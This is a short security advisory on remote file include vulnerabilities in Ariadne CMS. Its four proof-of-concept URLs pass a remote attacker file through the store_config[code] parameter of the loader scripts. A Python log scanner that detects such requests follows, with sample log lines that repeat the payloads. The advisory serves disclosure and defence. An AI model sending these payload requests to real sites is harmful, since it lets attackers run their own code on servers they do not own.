RETIRED: Ariadne CMS Multiple Remote File Include Vulnerabilities

Attackers can exploit this issue via a web client.

The following proofs of concept are available:

www.example.com/script_path/lib/includes/loader.cmd.php?store_config[code]=http://www.example.com/attackerfile
www.example.com/script_path/lib/includes/loader.ftp.php?store_config[code]=http://www.example.com/attackerfile
www.example.com/script_path/lib/includes/loader.soap.php?store_config[code]=http://www.example.com/attackerfile
www.example.com/script_path/lib/includes/loader.web.php?store_config[code]=http://www.example.com/attackerfile
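
A log check for the request pattern in the proofs of concept above, added here as an example and not part of the original advisory: it flags access-log requests to the four loader scripts whose store_config[code] parameter carries a remote URL. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Loader scripts named in the advisory's proof-of-concept URLs.
LOADER_RE = re.compile(r"/lib/includes/loader\.(cmd|ftp|soap|web)\.php$", re.I)
# A value that points at a remote resource: "scheme://" or protocol-relative "//".
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)
# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def flag_request(target):
    """Return (script, value) if target sets store_config[code] to a remote URL."""
    parts = urlsplit(target)
    m = LOADER_RE.search(parts.path)
    if not m:
        return None
    # parse_qsl percent-decodes names and values, so the encoded form
    # store_config%5Bcode%5D is matched as well as the literal brackets.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == "store_config[code]" and REMOTE_RE.match(value):
            return (f"loader.{m.group(1).lower()}.php", value)
    return None

def scan(lines):
    """Return (line_number, script, value) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        hit = flag_request(m.group(1)) if m else None
        if hit:
            hits.append((n, *hit))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /script_path/lib/includes/'
    'loader.web.php?store_config[code]=http://www.example.com/attackerfile HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /script_path/lib/includes/'
    'loader.soap.php?store_config%5Bcode%5D=http%3A%2F%2Fwww.example.com%2Fattackerfile'
    ' HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /script_path/lib/includes/'
    'loader.web.php?page=home HTTP/1.1" 200 2048',
    '192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?'
    'store_config[code]=http://www.example.com/x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```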


 

Copyright 2010, SecurityFocus